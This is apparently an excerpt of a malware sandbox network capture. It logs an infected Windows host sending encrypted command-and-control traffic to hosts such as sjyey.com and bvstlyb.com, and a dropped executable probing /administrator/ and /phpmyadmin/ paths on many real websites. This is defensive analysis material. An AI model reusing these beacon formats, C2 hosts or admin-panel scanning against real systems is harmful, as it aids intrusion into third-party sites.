Feb 21, 2024 00:25:51.092307091 CET	194	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 20 Feb 2024 23:25:50 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 03 00 00 00 1f 3d 5b 0d 0a 30 0d 0a 0d 0a Data Ascii: 7=[0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.6	49801	175.119.10.231	80	4004	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:25:56.682868958 CET	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wltdgnqwdyxfpcbj.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 291 Host: sjyey.com
Feb 21, 2024 00:25:56.682915926 CET	291	OUT	Data Raw: 3b 6e 57 19 81 ce 6a 55 da a2 c4 01 00 05 79 bb 7c 7f cc 94 18 01 e2 64 0f 7f 7f 97 48 b0 cf 18 ef 2d ce 5a 03 18 25 18 ef ed 3f c6 21 30 d8 ed 6a bf 48 59 bf 63 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 55 35 f0 f7 Data Ascii: ;nWjUy\|dH-Z%?!0jHYcM@NA .[k,vuU5bEMyD*5jFbGy5`PP7V_)&JKB,'f]\@f#-FzPGWVIL]Vhml`dlI
Feb 21, 2024 00:25:57.747085094 CET	252	IN	HTTP/1.0 404 Not Found Date: Tue, 20 Feb 2024 23:25:57 GMT Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15 X-Powered-By: PHP/7.4.15 Content-Length: 7 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.6	49804	185.196.8.22	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:01.355617046 CET	318	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef715c7ee919933 HTTP/1.1 Host: bvstlyb.com User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 21, 2024 00:26:01.589041948 CET	1286	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Tue, 20 Feb 2024 23:26:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 39 64 30 0d 0a 36 37 62 36 38 61 38 61 33 32 30 33 61 37 37 62 30 34 31 38 66 35 35 66 36 37 37 30 38 64 63 34 35 39 66 62 38 62 64 32 65 39 31 62 31 36 66 35 61 61 35 32 66 63 35 32 39 31 62 64 64 33 38 32 64 37 63 30 31 34 63 34 31 34 64 65 65 35 63 38 36 35 37 32 65 33 31 34 39 31 38 64 38 34 31 34 32 39 65 63 36 39 35 61 61 63 37 32 65 38 36 34 61 61 32 64 35 37 63 31 66 38 64 39 30 62 63 30 34 33 63 36 37 34 62 35 30 65 66 63 33 31 39 34 32 30 65 32 30 65 61 31 36 34 63 66 35 30 62 62 65 33 34 35 65 38 34 34 37 65 34 62 65 34 33 61 36 36 39 34 33 32 37 39 38 63 66 62 31 36 63 61 65 61 39 35 39 61 33 30 63 34 36 61 38 38 31 34 64 39 35 37 39 31 32 63 62 66 34 37 62 32 65 61 35 36 32 62 65 65 37 62 64 32 66 36 37 30 62 64 39 31 65 65 64 36 34 61 66 38 33 66 63 61 31 36 32 62 35 66 35 61 32 61 65 30 32 35 37 32 30 33 36 30 62 63 66 32 38 63 66 65 38 66 33 33 35 30 65 37 35 64 36 35 32 35 66 66 32 30 35 65 66 37 66 63 65 63 38 61 66 66 32 30 37 61 61 34 65 34 35 39 39 33 38 35 66 61 36 34 32 34 31 62 62 37 36 64 65 66 39 38 63 30 62 37 37 62 64 38 37 35 30 37 32 62 32 66 36 36 61 64 35 31 63 34 64 65 61 64 33 39 32 35 62 63 63 63 31 30 62 39 30 30 62 30 62 63 33 61 62 63 64 62 63 39 33 34 37 36 32 30 30 62 64 33 33 30 65 30 31 61 65 62 63 66 62 63 30 36 34 38 63 63 33 39 31 32 64 61 35 37 64 39 66 35 36 39 39 65 32 64 62 37 39 64 35 66 61 36 65 36 63 65 61 66 63 36 32 35 32 32 62 62 37 65 61 33 65 66 30 65 39 65 61 61 62 66 37 33 35 61 61 62 38 36 66 64 32 34 62 33 66 63 38 35 38 37 30 31 65 63 31 33 65 37 34 34 38 31 34 39 36 39 63 35 62 36 63 31 66 64 64 33 34 66 36 36 62 66 39 38 65 62 32 34 61 65 37 31 38 38 31 31 33 36 61 63 32 30 64 65 33 61 64 64 39 66 30 30 63 30 35 63 62 33 33 39 31 61 31 64 35 30 63 33 63 39 36 66 35 61 33 62 34 63 36 32 38 66 66 66 38 65 32 61 32 37 36 38 34 37 30 65 63 64 63 33 62 39 30 65 31 35 66 63 63 38 62 30 65 63 64 37 33 37 37 66 37 62 65 63 33 36 38 34 64 63 30 34 30 39 34 31 38 33 61 63 63 33 31 64 34 64 34 37 64 65 37 65 37 35 35 61 33 38 34 62 66 64 64 36 64 62 64 32 66 37 63 39 34 64 39 61 33 61 36 36 34 63 66 65 37 63 33 34 38 39 32 39 62 30 63 64 38 64 37 65 38 33 34 61 63 32 38 65 32 37 30 32 30 61 36 32 39 64 66 64 39 66 65 61 31 38 30 34 61 66 32 61 39 34 64 39 31 35 37 61 31 64 64 66 33 37 63 35 65 61 39 35 30 31 37 63 33 34 37 31 39 64 33 65 30 62 65 38 34 32 34 34 37 66 36 31 39 38 34 61 64 66 61 36 61 36 65 34 33 65 61 30 64 31 63 32 31 62 35 34 38 38 33 33 63 39 34 32 35 66 39 33 62 33 64 36 36 34 63 63 35 35 33 39 62 64 36 62 65 32 32 64 32 64 62 34 36 64 39 65 35 35 31 65 63 39 62 61 61 35 61 37 36 64 62 39 63 31 30 63 39 37 34 34 64 37 64 65 63 62 34 62 61 36 31 38 62 65 35 64 66 34 61 64 62 35 37 62 39 39 61 66 32 37 62 34 32 64 33 31 30 63 33 64 63 36 38 36 37 38 31 63 65 32 61 30 63 32 34 65 36 63 65 62 32 39 32 36 32 63 31 64 30 36 64 65 32 37 61 39 34 64 61 30 31 66 39 32 34 61 64 63 61 38 63 64 38 64 34 39 66 63 34 32 39 37 38 33 62 33 64 65 32 32 30 66 64 38 32 38 32 37 61 34 38 62 35 66 63 39 35 39 31 39 30 36 34 66 63 63 34 37 31 33 35 38 32 34 34 61 30 33 65 32 39 36 34 64 34 34 61 61 30 61 33 39 63 62 66 31 61 33 30 31 63 39 65 62 37 32 61 66 65 30 65 31 66 35 30 32 32 31 37 38 64 34 30 30 63 32 63 64 31 35 61 64 35 33 66 62 35 35 32 31 37 33 62 Data Ascii: 9d067b68a8a3203a77b0418f55f67708dc459fb8bd2e91b16f5aa52fc5291bdd382d7c014c414dee5c86572e314918d841429ec695aac72e864aa2d57c1f8d90bc043c674b50efc319420e20ea164cf50bbe345e8447e4be43a669432798cfb16caea959a30c46a8814d957912cbf47b2ea562bee7bd2f670bd91eed64af83fca162b5f5a2ae025720360bcf28cfe8f3350e75d6525ff205ef7fcec8aff207aa4e4599385fa64241bb76def98c0b77bd875072b2f66ad51c4dead3925bccc10b900b0bc3abcdbc93476200bd330e01aebcfbc0648cc3912da57d9f5699e2db79d5fa6e6ceafc62522bb7ea3ef0e9eaabf735aab86fd24b3fc858701ec13e744814969c5b6c1fdd34f66bf98eb24ae71881136ac20de3add9f00c05cb3391a1d50c3c96f5a3b4c628fff8e2a2768470ecdc3b90e15fcc8b0ecd7377f7bec3684dc04094183acc31d4d47de7e755a384bfdd6dbd2f7c94d9a3a664cfe7c348929b0cd8d7e834ac28e27020a629dfd9fea1804af2a94d9157a1ddf37c5ea95017c34719d3e0be842447f61984adfa6a6e43ea0d1c21b548833c9425f93b3d664cc5539bd6be22d2db46d9e551ec9baa5a76db9c10c9744d7decb4ba618be5df4adb57b99af27b42d310c3dc686781ce2a0c24e6ceb29262c1d06de27a94da01f924adca8cd8d49fc429783b3de220fd82827a48b5fc95919064fcc471358244a03e2964d44aa0a39cbf1a301c9eb72afe0e1f5022178d400c2cd15ad53fb552173b
Feb 21, 2024 00:26:01.589056969 CET	1286	IN	Data Raw: 34 63 35 34 63 62 61 38 64 31 38 30 37 33 33 66 33 63 39 33 30 63 34 63 38 39 37 64 63 63 36 62 33 36 32 39 34 64 63 33 63 32 66 32 64 30 61 33 32 61 38 37 34 32 39 66 30 62 66 66 66 61 64 62 35 33 33 30 33 64 31 61 33 63 63 38 32 35 34 66 36 66 Data Ascii: 4c54cba8d180733f3c930c4c897dcc6b36294dc3c2f2d0a32a87429f0bfffadb53303d1a3cc8254f6f3a14b3c00bf4744f7b11b0cab9f4020faafcec3e1cfaab9c05fad94c3b755cd73094bc47cede220f1fb3bacb4c00df05d6f8fd82fc42d299e7a5ba6f4c9a83ff557d98099c903729f627fb01f09dd71c1
Feb 21, 2024 00:26:01.589070082 CET	143	IN	Data Raw: 65 30 32 33 33 64 62 30 38 61 30 31 30 62 32 32 30 39 63 35 30 37 63 35 31 35 35 61 39 31 66 37 39 34 31 36 63 65 61 61 37 33 32 39 36 63 32 34 66 37 36 63 38 65 34 64 62 36 34 33 30 38 34 33 66 39 62 61 64 30 34 63 62 66 39 61 65 62 32 33 65 36 Data Ascii: e0233db08a010b2209c507c5155a91f79416ceaa73296c24f76c8e4db6430843f9bad04cbf9aeb23e6c6ede8e9553ba9affc8972e3208ee50e8c511ed68f94167eea762be096c
Feb 21, 2024 00:26:01.589148045 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Feb 21, 2024 00:26:05.517249107 CET	326	OUT	GET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12eab517aa5c96bd86ef968548815a8bbc896c58e713bc90c91936b5281fc235a925ed3e5dd6bd974a95129070b615e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef9d9e3ccc6b951e HTTP/1.1 Host: bvstlyb.com User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
Feb 21, 2024 00:26:05.791780949 CET	220	IN	HTTP/1.1 200 OK Server: nginx/1.20.1 Date: Tue, 20 Feb 2024 23:26:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive X-Powered-By: PHP/7.4.33 Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a Data Ascii: e67b680813008c20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.6	50943	15.197.204.56	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:03.314785004 CET	174	OUT	GET /administrator/ HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:03.410538912 CET	224	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:03 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://att.com.au/administrator/ ETag: "65d0dd59-0"
Feb 21, 2024 00:26:05.564739943 CET	390	OUT	GET /administrator/index.php HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip Cookie: expiry_partner=; lander_type=parking; caf_ipaddr=191.96.227.222; _policy={"restricted_market":false,"tracking_market":"none"}; country=US; city="Phoenix" User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://att.com.au/administrator/
Feb 21, 2024 00:26:05.660116911 CET	233	IN	HTTP/1.1 301 Moved Permanently Server: openresty Date: Tue, 20 Feb 2024 23:26:05 GMT Content-Type: text/plain Content-Length: 0 Connection: keep-alive Location: https://att.com.au/administrator/index.php ETag: "65d0dd59-0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.6	51957	3.33.139.32	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:05.230963945 CET	177	OUT	GET /administrator/ HTTP/1.1 Host: protonmail.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:05.376890898 CET	484	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:05 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 60 Connection: keep-alive cache-control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Frame-Options: DENY Content-Security-Policy: script-src 'self' Location: https://protonmail.com/de/ Vary: Accept Data Raw: 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 72 6f 74 6f 6e 6d 61 69 6c 2e 63 6f 6d 2f 64 65 2f Data Ascii: Moved Permanently. Redirecting to https://protonmail.com/de/
Feb 21, 2024 00:26:11.888024092 CET	222	OUT	GET /administrator/index.php HTTP/1.1 Host: protonmail.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://proton.me/de/mail
Feb 21, 2024 00:26:12.038095951 CET	484	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 60 Connection: keep-alive cache-control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Frame-Options: DENY Content-Security-Policy: script-src 'self' Location: https://protonmail.com/de/ Vary: Accept Data Raw: 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 72 6f 74 6f 6e 6d 61 69 6c 2e 63 6f 6d 2f 64 65 2f Data Ascii: Moved Permanently. Redirecting to https://protonmail.com/de/
Feb 21, 2024 00:26:12.263058901 CET	484	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:11 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 60 Connection: keep-alive cache-control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Frame-Options: DENY Content-Security-Policy: script-src 'self' Location: https://protonmail.com/de/ Vary: Accept Data Raw: 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 73 3a 2f 2f 70 72 6f 74 6f 6e 6d 61 69 6c 2e 63 6f 6d 2f 64 65 2f Data Ascii: Moved Permanently. Redirecting to https://protonmail.com/de/

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.6	53429	217.70.184.38	80

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.205497026 CET	182	OUT	GET /phpmyadmin/ HTTP/1.1 Host: network-abilities.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.370532036 CET	1167	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 20 Feb 2024 23:26:06 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Language Content-Encoding: gzip Data Raw: 33 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 a5 55 cd 72 db 36 10 be e7 29 50 5e 9c 4c 46 a4 29 d9 b1 d4 a1 98 49 ed 5a 4e 2b 8f 5c 3b b5 27 ba 68 40 70 45 c2 02 01 06 00 45 d1 a7 bc 46 5f af 4f d2 e5 8f 52 39 96 a6 9d f6 02 81 c0 b7 bb d8 6f bf 5d 05 3f 5c cc ce 3f 7d be f9 99 a4 36 13 e1 ab a0 fe 21 4c 50 63 c6 8e 54 bd 47 e3 10 41 65 32 06 19 be 22 24 48 81 c6 f5 06 b7 19 58 4a 58 4a b5 01 3b 76 0a bb ec 0d 9d dd 2b 49 33 18 3b 6b 0e 65 ae b4 75 08 53 d2 82 44 68 c9 63 9b 8e 63 58 73 06 bd e6 63 8f 5d 0c 86 69 9e 5b ae e4 8e e9 a7 94 1b 12 ab 8c 72 d9 e0 48 4a 0d 89 00 24 d1 90 70 63 41 43 4c 4a 6e 53 32 a1 32 e6 ae 04 eb 92 8f 96 a0 15 2b b4 46 1f a2 22 39 d5 2b 84 45 15 b1 29 10 55 4a d0 ee f6 05 96 5b 01 21 9a 95 4a af 7a 34 e2 82 5b 0e c6 65 2a 0b bc f6 b2 05 0a 2e 57 18 54 8c 1d 63 2b 01 26 05 c0 1c 6d 95 e3 db 2d 6c ac c7 0c 52 97 6a 58 8e 9d fa b9 bd b3 e1 f0 e4 64 70 7a ec d6 17 2f 9d a4 c8 11 2b f0 a5 ac 4e b8 b5 5b d2 75 fd e9 e2 b2 75 cd 33 9a 80 b7 e9 35 30 ef 85 9b 1c 57 45 63 87 50 2c df 12 59 fb e6 0a f7 c6 bb ae 57 d0 9a da de 2d 24 85 a0 da 2d d5 72 d9 df 7a af 51 5e 77 c2 b4 32 46 69 9e 70 f9 7f e2 dc 41 c6 7f 52 22 fe f7 81 02 6f 2b b2 20 52 71 d5 c5 8e f9 7a 2b cb 1b ac 1f 97 c9 0d 32 b1 e8 1f f7 07 3d ad 94 5d f4 e3 bc 30 c4 09 83 46 1c 1d 74 26 e2 3b 4b 2d 67 3b 40 ff c3 a4 f2 49 e7 64 e7 fc 4b 7a fd 5b 1f ed 31 52 18 50 8d 46 02 be 0b d9 a2 3b 35 2e 7c fd 61 78 86 06 a9 7f 20 5c a3 97 85 3f 60 f0 ab 13 fe 07 e9 22 13 7e b8 9b f9 f7 fe 51 67 8b c1 99 fc 32 7b 9e 4e 73 ee ff 32 af 50 68 41 8e c9 74 c5 49 ad cd cd 8f 9e 57 a6 8a 1b 37 d9 86 f1 40 7a 1a 4c 21 ac 79 6f 80 6a 96 8e f7 36 00 3a 33 56 2b 99 84 f7 d8 d4 4d f3 3c 5c cd 3e de 91 ce 98 a8 25 39 d0 39 9d 5d e0 d1 90 58 45 12 b0 8d 79 4b c7 9f 5f ff 30 24 2f 22 c1 59 c7 05 0a 07 fb 9e 70 b9 54 3a 6b f6 6e e0 61 22 5e 53 9b 97 52 68 d3 ce 95 e1 35 36 52 9b 45 7f 96 4c 53 e7 30 56 15 48 78 03 7c f4 87 b6 a6 69 2f 2c 52 3a 6e 71 fe a4 8c 16 35 03 39 95 7b a1 f5 63 6b e0 c5 75 bc b4 7f 53 f5 0f 84 44 9a a0 e8 51 19 85 a4 6b ca 05 8d 04 e0 2d 06 09 77 32 6e d7 fd 4f ac 9b d2 9c a3 24 91 49 d0 0b 7f b4 f1 99 13 3e 50 69 49 a5 0a 5d cf b7 5d d9 bd c7 90 de 1e 49 94 e5 73 41 b4 26 4e 38 45 41 48 92 29 0d 84 46 c8 da 4e dd 5a 19 a3 d6 40 1a a4 dd 90 12 48 46 25 b6 65 5d e7 36 ce 41 ba a2 c2 5a 25 17 8f a7 53 ae b7 b4 2a c9 50 03 ab fa 1f 42 c6 aa 74 85 62 6d f1 35 e4 82 32 78 4d ad 8a 5e 1f d1 ab db 63 76 75 fd 6e 5a 8d 9e e8 64 54 4e b3 38 8d b2 db 7c 9a 9d 8a f8 7c 24 22 3e 5a 45 7d 3f a5 0f 27 6b 36 b8 97 f3 fe fd 53 7c 31 7a 8a 06 f7 d5 e7 fe ef 23 36 b9 ac 68 5f 14 f3 6a fe 34 7f b8 c4 b3 64 74 f4 86 bc 25 47 7b 8b 75 f4 c6 21 5a 09 9c 5a 35 d5 38 c1 f0 56 c6 b0 19 3b c7 4e 78 89 5b 42 9f 11 62 78 86 75 d4 b5 ce 0f 15 bf 2d ef 4e 95 bb 71 f3 ad de b5 b7 ee a3 99 88 ed 20 c4 79 d0 fc 49 ff 05 75 b4 23 94 b5 07 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 3aeUr6)P^LF)IZN+\;'h@pEEF_OR9o]?\?}6!LPcTGAe2"$HXJXJ;v+I3;keuSDhccXsc]i[rHJ$pcACLJnS22+F"9+E)UJ[!Jz4[e.WTc+&m-lRjXdpz/+N[uu350WEcP,YW-$-rzQ^w2FipAR"o+ Rqz+2=]0Ft&;K-g;@IdKz[1RPF;5.\|ax \?`"~Qg2{Ns2PhAtIW7@zL!yoj6:3V+M<\>%99]XEyK_0$/"YpT:kna"^SRh56RELS0VHx\|i/,R:nq59{ckuSDQk-w2nO$I>PiI]]IsA&N8EAH)FNZ@HF%e]6AZ%SPBtbm52xM^cvunZdTN8\|\|$">ZE}?'k6S\|1z#6h_j4dt%G{u!ZZ58V;Nx[Bbxu-Nq yIu#0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.6	52280	91.136.8.144	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.611088991 CET	175	OUT	GET /administrator/ HTTP/1.1 Host: derbyron.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.780675888 CET	173	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:06 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 21 Connection: keep-alive Data Raw: 4e 6f 74 20 46 6f 75 6e 64 20 5b 43 46 4e 20 23 30 30 30 35 5d Data Ascii: Not Found [CFN #0005]
Feb 21, 2024 00:26:06.783958912 CET	228	OUT	GET /administrator/index.php HTTP/1.1 Host: derbyron.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: http://derbyron.de/administrator/
Feb 21, 2024 00:26:06.948687077 CET	173	IN	HTTP/1.1 404 Not Found Date: Tue, 20 Feb 2024 23:26:06 GMT Content-Type: text/html; charset=iso-8859-1 Content-Length: 21 Connection: keep-alive Data Raw: 4e 6f 74 20 46 6f 75 6e 64 20 5b 43 46 4e 20 23 30 30 30 35 5d Data Ascii: Not Found [CFN #0005]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.6	52097	104.21.54.169	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.630369902 CET	187	OUT	GET /administrator/ HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.729624987 CET	703	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:06 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Wed, 21 Feb 2024 00:26:06 GMT Location: https://fortressrealcapital.com/administrator/ Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uXn5zeljegQa45nB9cZorrTbGHcMkXsGOh0TvNTH0QnFzUpDaj5EHRjzWfSTMe9R1VR1CmRmXgSO%2BtbK5AZKLID5%2BI5rzFD%2Btxto3PJU9sg1tMG9dfrkN%2B3LV%2BFbN%2FUsAFTweZ8ZMkAr4Q%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 858a833ba8777ca2-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
Feb 21, 2024 00:26:10.068912029 CET	253	OUT	GET /administrator/index.php HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://fortressrealcapital.com/administrator/
Feb 21, 2024 00:26:10.163151979 CET	710	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 20 Feb 2024 23:26:10 GMT Transfer-Encoding: chunked Connection: keep-alive Cache-Control: max-age=3600 Expires: Wed, 21 Feb 2024 00:26:10 GMT Location: https://fortressrealcapital.com/administrator/index.php Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zu%2F7XYDH1%2Bt52RRN6Q3uGtfKC9UHm%2FsYYmdPXiWmk3X5RCA53cojyvlX1ucJeos7RWKBM8huQG5vNdW1I7u2a8LJVhyTwWeH6HVfT1K5AQbpU6TQFPv8cNmAG%2Fy3%2BPAPjm9sn6L2SvcgWg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Vary: Accept-Encoding Server: cloudflare CF-RAY: 858a83512d2f7ca2-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.6	52099	198.185.159.145	80	2704	C:\Users\user\AppData\Local\Temp\81F7.exe

Timestamp	Bytes transferred	Direction	Data
Feb 21, 2024 00:26:06.630462885 CET	176	OUT	GET /administrator/ HTTP/1.1 Host: mwpmedia.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:06.742471933 CET	281	IN	HTTP/1.1 301 Moved Permanently Age: 0 Date: Tue, 20 Feb 2024 23:26:06 GMT Location: https://www.mwpmedia.com/administrator/ Server: Squarespace Set-Cookie: crumb=BXbwiDwlRJolZmI4YmU4YTEyYjY5NTViYzJhODljNTYxOTM1M2Ex;Path=/ X-Contextid: gkSVGJZZ/tRT6TKPs Content-Length: 0
Feb 21, 2024 00:26:10.229332924 CET	253	OUT	GET /administrator/index.php HTTP/1.1 Host: mwpmedia.com Accept: / Accept-Encoding: deflate, gzip Cookie: crumb=BXbwiDwlRJolZmI4YmU4YTEyYjY5NTViYzJhODljNTYxOTM1M2Ex User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
Feb 21, 2024 00:26:10.322890997 CET	1276	IN	HTTP/1.1 404 Not Found Cache-Control: no-cache, must-revalidate Content-Length: 77570 Content-Type: text/html; charset=UTF-8 Date: Tue, 20 Feb 2024 23:26:10 UTC Expires: Thu, 01 Jan 1970 00:00:00 UTC Pragma: no-cache Server: Squarespace X-Contextid: gkSVGJZZ/1jDNvuoc Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 